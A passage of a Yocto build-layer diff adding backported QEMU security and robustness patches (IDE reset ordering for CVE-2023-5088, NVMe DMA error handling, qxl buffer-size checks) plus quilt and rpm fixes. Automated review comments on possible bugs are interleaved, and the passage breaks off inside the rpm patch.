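+CVE: CVE-2023-5088
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/ide/core.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/hw/ide/core.c b/hw/ide/core.c
+index b5e0dcd29b2..63ba665f3d2 100644
+--- a/hw/ide/core.c
++++ b/hw/ide/core.c
+@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
+
+ void ide_bus_reset(IDEBus *bus)
+ {
+- bus->unit = 0;
+- bus->cmd = 0;
+- ide_reset(&bus->ifs[0]);
+- ide_reset(&bus->ifs[1]);
+- ide_clear_hob(bus);
+-
+- /* pending async DMA */
++ /* pending async DMA - needs the IDEState before it is reset */
+ if (bus->dma->aiocb) {
+ trace_ide_bus_reset_aio();
+ blk_aio_cancel(bus->dma->aiocb);
+ bus->dma->aiocb = NULL;
+ }
+
++ bus->unit = 0;
++ bus->cmd = 0;
++ ide_reset(&bus->ifs[0]);
++ ide_reset(&bus->ifs[1]);
++ ide_clear_hob(bus);
++
+ /* reset dma provider too */
+ if (bus->dma->ops->reset) {
+ bus->dma->ops->reset(bus->dma);
+--
+GitLab
+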
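Review bot: The single `blk_aio_cancel()` followed by `bus->dma->aiocb = NULL` assumes the completion callback starts no further I/O, yet the trace in the patch description shows ide_dma_cb() issuing a new dma_blk_io() from inside the cancel path. With the new ordering that callback sees the pre-reset IDEState, so for a transfer with sectors still outstanding it may queue the next chunk (not verifiable from this hunk), whose handle the assignment then drops and which would complete after ide_reset(). It is worth confirming that ide_dma_cb() cannot re-arm here and recording the ordering constraint in the comment, e.g. `/* cancel first: blk_aio_cancel() can run ide_dma_cb() synchronously and it must see the un-reset IDEState */`. ide_bus_reset() continues past the end of the hunk.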
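--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
+From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:07:17 -0700
+Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
+
+Handling DMA errors gracefully is required for the device to pass the
+block/011 test ("disable PCI device while doing I/O") in the blktests
+suite.
+
+With this patch the device sets the Controller Fatal Status bit in the
+CSTS register when failing to read from a submission queue or writing to
+a completion queue; expecting the host to reset the controller.
+
+If DMA errors occur at any other point in the execution of the command
+(say, while mapping the PRPs), the command is aborted with a Data
+Transfer Error status code.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 41 +++++++++++++++++++++++++++++++----------
+ hw/block/trace-events | 3 +++
+ 2 files changed, 34 insertions(+), 10 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index e6f24a6..bda446d 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
+-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
++static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- return;
++ return 0;
+ }
+
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ hwaddr trans_len = n->page_size - (prp1 % n->page_size);
+ trans_len = MIN(len, trans_len);
+ int num_prps = (len >> n->page_bits) + 1;
++ int ret;
+
+ if (unlikely(!prp1)) {
+ trace_nvme_err_invalid_prp();
+@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp2);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ while (len != 0) {
+ uint64_t prp_ent = le64_to_cpu(prp_list[i]);
+
+@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ i = 0;
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp_ent, (void *)prp_list,
+- prp_trans);
++ ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
++ prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp_ent);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ prp_ent = le64_to_cpu(prp_list[i]);
+ }
+
+@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
+ NvmeCQueue *cq = opaque;
+ NvmeCtrl *n = cq->ctrl;
+ NvmeRequest *req, *next;
++ int ret;
+
+ QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
+ NvmeSQueue *sq;
+@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
+ break;
+ }
+
+- QTAILQ_REMOVE(&cq->req_list, req, entry);
+ sq = req->sq;
+ req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
+ req->cqe.sq_id = cpu_to_le16(sq->sqid);
+ req->cqe.sq_head = cpu_to_le16(sq->head);
+ addr = cq->dma_addr + cq->tail * n->cqe_size;
++ ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
++ sizeof(req->cqe));
++ if (ret) {
++ trace_pci_nvme_err_addr_write(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
++ QTAILQ_REMOVE(&cq->req_list, req, entry);
+ nvme_inc_cq_tail(cq);
+- pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
+- sizeof(req->cqe));
+ QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
+ }
+ if (cq->tail != cq->head) {
+@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
+
+ while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
+ addr = sq->dma_addr + sq->head * n->sqe_size;
+- nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
++ if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
++ trace_pci_nvme_err_addr_read(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
+ nvme_inc_sq_head(sq);
+
+ req = QTAILQ_FIRST(&sq->req_list);
+diff --git a/hw/block/trace-events b/hw/block/trace-events
+index c03e80c..4e4ad4e 100644
+--- a/hw/block/trace-events
++++ b/hw/block/trace-events
+@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
+ nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
+
+ # nvme traces for error conditions
++pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_cfs(void) "controller fatal status"
+ nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
+ nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
+ nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
+--
+1.8.3.1
+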
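Review bot: Both new failure paths in nvme_map_prp() leave with a bare `return NVME_DATA_TRAS_ERROR;` when nvme_addr_read() fails. The part of the function that fills `qsg`/`iov` lies outside the hunks, but the PRP list is presumably read only after PRP1 has been added, so whatever was initialised by then would not be released on these two returns. If the function's other error exits go through a cleanup label, these should as well, carrying the status in a local: `status = NVME_DATA_TRAS_ERROR; goto <cleanup label>;`. In nvme_post_cqes() the request now stays on `cq->req_list` when pci_dma_write() fails, which looks intended and would be clearer with a short comment saying so.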
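--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
+From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
+From: Klaus Jensen <k.jensen@samsung.com>
+Date: Tue, 9 Jun 2020 21:03:17 +0200
+Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Pull the controller memory buffer check to its own function. The check
+will be used on its own in later patches.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+---
+ hw/block/nvme.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index 12d8254..e6f24a6 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -52,14 +52,22 @@
+
+ static void nvme_process_sq(void *opaque);
+
++static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr low = n->ctrl_mem.addr;
++ hwaddr hi = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
++
++ return addr >= low && addr < hi;
++}
++
+ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+- if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+- addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
++ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- } else {
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return;
+ }
++
++ pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+--
+1.8.3.1
+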
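Review bot: nvme_addr_is_cmb() tests only the first byte of the access, while nvme_addr_read() then copies `size` bytes out of `cmbuf` with memcpy(). Assuming `cmbuf` is as large as `ctrl_mem`, a read that starts inside the controller memory buffer and extends beyond its end passes the check and reads past the buffer; the refactor carries that behaviour over from the old inline condition. Checking the last byte as well closes it: `if (n->cmbsz && nvme_addr_is_cmb(n, addr) && nvme_addr_is_cmb(n, addr + size - 1)) {`, together with rejecting `size <= 0` since `size` is a signed int. Whether callers can pass a guest-chosen address and length here is not visible in this hunk.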
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
1From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
3Date: Mon, 28 Nov 2022 21:27:39 +0100
4Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Currently qxl_phys2virt() doesn't check for buffer overrun.
10In order to do so in the next commit, pass the buffer size
11as argument.
12
13For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
14verify the size of the chunked data ahead, checking we can
15access 'sizeof(QXLCursor) + chunk->data_size' bytes.
16Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
17assumed to fit in one chunk, no change are required.
18In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
19qxl_unpack_chunks().
20
21Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
22Acked-by: Gerd Hoffmann <kraxel@redhat.com>
23Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
24Message-Id: <20221128202741.4945-4-philmd@linaro.org>
25
26Backport and rebase patch to fix compile error which imported by CVE-2022-4144.patch:
27
28/qxl.c: In function 'qxl_phys2virt':
29| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
30| 1508 | if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
31| | ^~~~
32| | gsize
33
34Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
35
36Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
37---
38 hw/display/qxl-logger.c | 22 +++++++++++++++++++---
39 hw/display/qxl-render.c | 20 ++++++++++++++++----
40 hw/display/qxl.c | 17 +++++++++++------
41 hw/display/qxl.h | 3 ++-
42 4 files changed, 48 insertions(+), 14 deletions(-)
43
44diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
45index 2ec6d8fa..031ddfec 100644
46--- a/hw/display/qxl-logger.c
47+++ b/hw/display/qxl-logger.c
48@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
49 QXLImage *image;
50 QXLImageDescriptor *desc;
51
52- image = qxl_phys2virt(qxl, addr, group_id);
53+ image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
54 if (!image) {
55 return 1;
56 }
57@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
58 cmd->u.set.position.y,
59 cmd->u.set.visible ? "yes" : "no",
60 cmd->u.set.shape);
61- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
62+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
63+ sizeof(QXLCursor));
64 if (!cursor) {
65 return 1;
66 }
67@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
68 {
69 bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
70 void *data;
71+ size_t datasz;
72 int ret;
73
74 if (!qxl->cmdlog) {
75@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
76 qxl_name(qxl_type, ext->cmd.type),
77 compat ? "(compat)" : "");
78
79- data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
80+ switch (ext->cmd.type) {
81+ case QXL_CMD_DRAW:
82+ datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
83+ break;
84+ case QXL_CMD_SURFACE:
85+ datasz = sizeof(QXLSurfaceCmd);
86+ break;
87+ case QXL_CMD_CURSOR:
88+ datasz = sizeof(QXLCursorCmd);
89+ break;
90+ default:
91+ goto out;
92+ }
93+ data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
94 if (!data) {
95 return 1;
96 }
97@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
98 qxl_log_cmd_cursor(qxl, data, ext->group_id);
99 break;
100 }
101+out:
102 fprintf(stderr, "\n");
103 return 0;
104 }
105diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
106index d532e157..a65a6d64 100644
107--- a/hw/display/qxl-render.c
108+++ b/hw/display/qxl-render.c
109@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
110 qxl->guest_primary.resized = 0;
111 qxl->guest_primary.data = qxl_phys2virt(qxl,
112 qxl->guest_primary.surface.mem,
113- MEMSLOT_GROUP_GUEST);
114+ MEMSLOT_GROUP_GUEST,
115+ qxl->guest_primary.abs_stride
116+ * height);
117 if (!qxl->guest_primary.data) {
118 return;
119 }
120@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
121 if (offset == size) {
122 return;
123 }
124- chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
125+ chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
126+ sizeof(QXLDataChunk) + chunk->data_size);
127 if (!chunk) {
128 return;
129 }
130@@ -289,7 +292,8 @@ fail:
131 /* called from spice server thread context only */
132 int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
133 {
134- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
135+ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
136+ sizeof(QXLCursorCmd));
137 QXLCursor *cursor;
138 QEMUCursor *c;
139
140@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
141 }
142 switch (cmd->type) {
143 case QXL_CURSOR_SET:
144- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
145+ /* First read the QXLCursor to get QXLDataChunk::data_size ... */
146+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
147+ sizeof(QXLCursor));
148+ if (!cursor) {
149+ return 1;
150+ }
151+ /* Then read including the chunked data following QXLCursor. */
152+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
153+ sizeof(QXLCursor) + cursor->chunk.data_size);
154 if (!cursor) {
155 return 1;
156 }
157diff --git a/hw/display/qxl.c b/hw/display/qxl.c
158index 6bc8385b..858d3e93 100644
159--- a/hw/display/qxl.c
160+++ b/hw/display/qxl.c
161@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
162 QXL_IO_MONITORS_CONFIG_ASYNC));
163 }
164
165- cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
166+ cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
167+ sizeof(QXLMonitorsConfig));
168 if (cfg != NULL && cfg->count == 1) {
169 qxl->guest_primary.resized = 1;
170 qxl->guest_head0_width = cfg->heads[0].width;
171@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
172 switch (le32_to_cpu(ext->cmd.type)) {
173 case QXL_CMD_SURFACE:
174 {
175- QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
176+ QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
177+ sizeof(QXLSurfaceCmd));
178
179 if (!cmd) {
180 return 1;
181@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
182 }
183 case QXL_CMD_CURSOR:
184 {
185- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
186+ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
187+ sizeof(QXLCursorCmd));
188
189 if (!cmd) {
190 return 1;
191@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
192 *
193 * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
194 */
195- void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
196+ void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
197+ sizeof(QXLCommandRing));
198 if (msg != NULL && (
199 msg < (void *)qxl->vga.vram_ptr ||
200 msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
201@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
202 }
203
204 /* can be also called from spice server thread context */
205-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
206+void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
207+ size_t size)
208 {
209 uint64_t offset;
210 uint32_t slot;
211@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
212 }
213
214 cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
215- MEMSLOT_GROUP_GUEST);
216+ MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
217 assert(cmd);
218 assert(cmd->type == QXL_SURFACE_CMD_CREATE);
219 qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
220diff --git a/hw/display/qxl.h b/hw/display/qxl.h
221index 80eb0d26..fcfd133a 100644
222--- a/hw/display/qxl.h
223+++ b/hw/display/qxl.h
224@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
225 #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
226
227 /* qxl.c */
228-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
229+void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
230+ size_t size);
231 void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
232 GCC_FMT_ATTR(2, 3);
233
234--
2352.25.1
236
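Review bot: In the `qxl_unpack_chunks` hunk of qxl-render.c the size requested for the next chunk is `sizeof(QXLDataChunk) + chunk->data_size`, where `chunk` is still the chunk being left, so the next chunk's own `data_size` is never the value that gets covered. The `QXL_CURSOR_SET` hunk in the same file already uses a two-step lookup (header first, then header plus the `data_size` just read), and the same pattern fits here. The loop body lies outside the hunk, and `qxl_phys2virt()` does not use `size` yet in this patch, so this only matters once the follow-up bounds check lands. The sketch keeps the guest-supplied address in a local so both lookups resolve the same value.

```c
/* … unchanged: copy of the current chunk and the offset == size exit … */
QXLPHYSICAL next = chunk->next_chunk;

/* First map only the header to learn the next chunk's own data_size ... */
chunk = qxl_phys2virt(qxl, next, group_id, sizeof(QXLDataChunk));
if (!chunk) {
    return;
}
/* ... then map the header plus that chunk's payload. */
chunk = qxl_phys2virt(qxl, next, group_id,
                      sizeof(QXLDataChunk) + chunk->data_size);
if (!chunk) {
    return;
}
```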
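--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
 }
 
 PACKAGECONFIG ??= " \
- fdt sdl kvm \
+ fdt sdl kvm slirp \
  ${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
+ ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
 "
-PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm"
+PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"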
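Review bot: The nativesdk default is now written with the colon override form, `PACKAGECONFIG:class-nativesdk`, while the hunk header still shows `do_install_append_class-nativesdk` in the underscore form, so the recipe mixes the two syntaxes. If the BitBake used on this branch does not treat `:` as an override separator here, the nativesdk build would silently take the general `PACKAGECONFIG` default instead; that cannot be confirmed from this hunk. Keeping the recipe's existing style, `PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm slirp"`, avoids the question. The new `seccomp` filter line applies only to the general default, so if the sandbox is wanted for nativesdk as well it has to be added to that line too.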
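--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
  file://Makefile \
  file://test.sh \
  file://0001-tests-Allow-different-output-from-mv.patch \
+ file://faildiff-order.patch \
 "
 
 SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"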
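--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Fri, 20 Jan 2023 12:56:08 +0100
+Subject: [PATCH] test: Fix a race condition
+
+The test suite does not differentiate between stdout and stderr. When
+messages are printed to both, the order in which they will reach us
+is apparently not guaranteed. Ideally this would be deterministic, but
+until then, explicitly test stdout and stderr separately in the test
+case itself. Otherwise the test suite fails randomly, which is a pain
+for distribution package maintainers.
+
+This fixes bug #63651 reported by Ross Burton:
+https://savannah.nongnu.org/bugs/index.php?63651
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+---
+ test/faildiff.test | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/test/faildiff.test b/test/faildiff.test
+index 5afb8e3..0444c15 100644
+--- a/test/faildiff.test
++++ b/test/faildiff.test
+@@ -27,8 +27,9 @@ What happens on binary files?
+ > File test.bin added to patch %{P}test.diff
+
+ $ printf "\\003\\000\\001" > test.bin
+- $ quilt diff -pab --no-index
++ $ quilt diff -pab --no-index 2>/dev/null
+ >~ (Files|Binary files) a/test\.bin and b/test\.bin differ
++ $ quilt diff -pab --no-index >/dev/null
+ > Diff failed on file 'test.bin', aborting
+ $ echo %{?}
+ > 1
+--
+2.34.1
+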
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
11Upstream-Status: Pending [merge of multithreading patches to upstream] 11Upstream-Status: Pending [merge of multithreading patches to upstream]
12 12
13Signed-off-by: Peter Bergin <peter@berginkonsult.se> 13Signed-off-by: Peter Bergin <peter@berginkonsult.se>
14Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14--- 15---
15 rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++ 16 rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
16 1 file changed, 34 insertions(+) 17 1 file changed, 36 insertions(+)
17 18
18diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c 19diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
19index e051c98..b3c56b6 100644 20index e051c98..b3c56b6 100644
20--- a/rpmio/rpmio.c 21--- a/rpmio/rpmio.c
21+++ b/rpmio/rpmio.c 22+++ b/rpmio/rpmio.c
22@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) 23@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
23 } 24 }
24 #endif 25 #endif
25 26
26+ struct rlimit virtual_memory; 27+ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
27+ getrlimit(RLIMIT_AS, &virtual_memory); 28+ int status = getrlimit(RLIMIT_AS, &virtual_memory);
28+ if (virtual_memory.rlim_cur != RLIM_INFINITY) { 29+ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
29+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur; 30+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
31+ uint32_t threads_max = lzma_cputhreads();
30+ const uint64_t virtual_memlimit_per_cpu_thread = 32+ const uint64_t virtual_memlimit_per_cpu_thread =
31+ virtual_memlimit / lzma_cputhreads(); 33+ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
32+ uint64_t memory_usage_virt;
33+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and " 34+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
34+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread); 35+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
36+ uint64_t memory_usage_virt;
35+ /* keep reducing the number of compression threads until memory 37+ /* keep reducing the number of compression threads until memory
36+ usage falls below the limit per CPU thread*/ 38+ usage falls below the limit per CPU thread*/
37+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) > 39+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
38+ virtual_memlimit_per_cpu_thread) { 40+ virtual_memlimit_per_cpu_thread) {
39+ /* If number of threads goes down to zero lzma_stream_encoder will 41+ /* If number of threads goes down to zero or in case of any other error
40+ * will return UINT64_MAX. We must check here to avoid an infinite loop. 42+ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
43+ * for both the cases here to avoid an infinite loop.
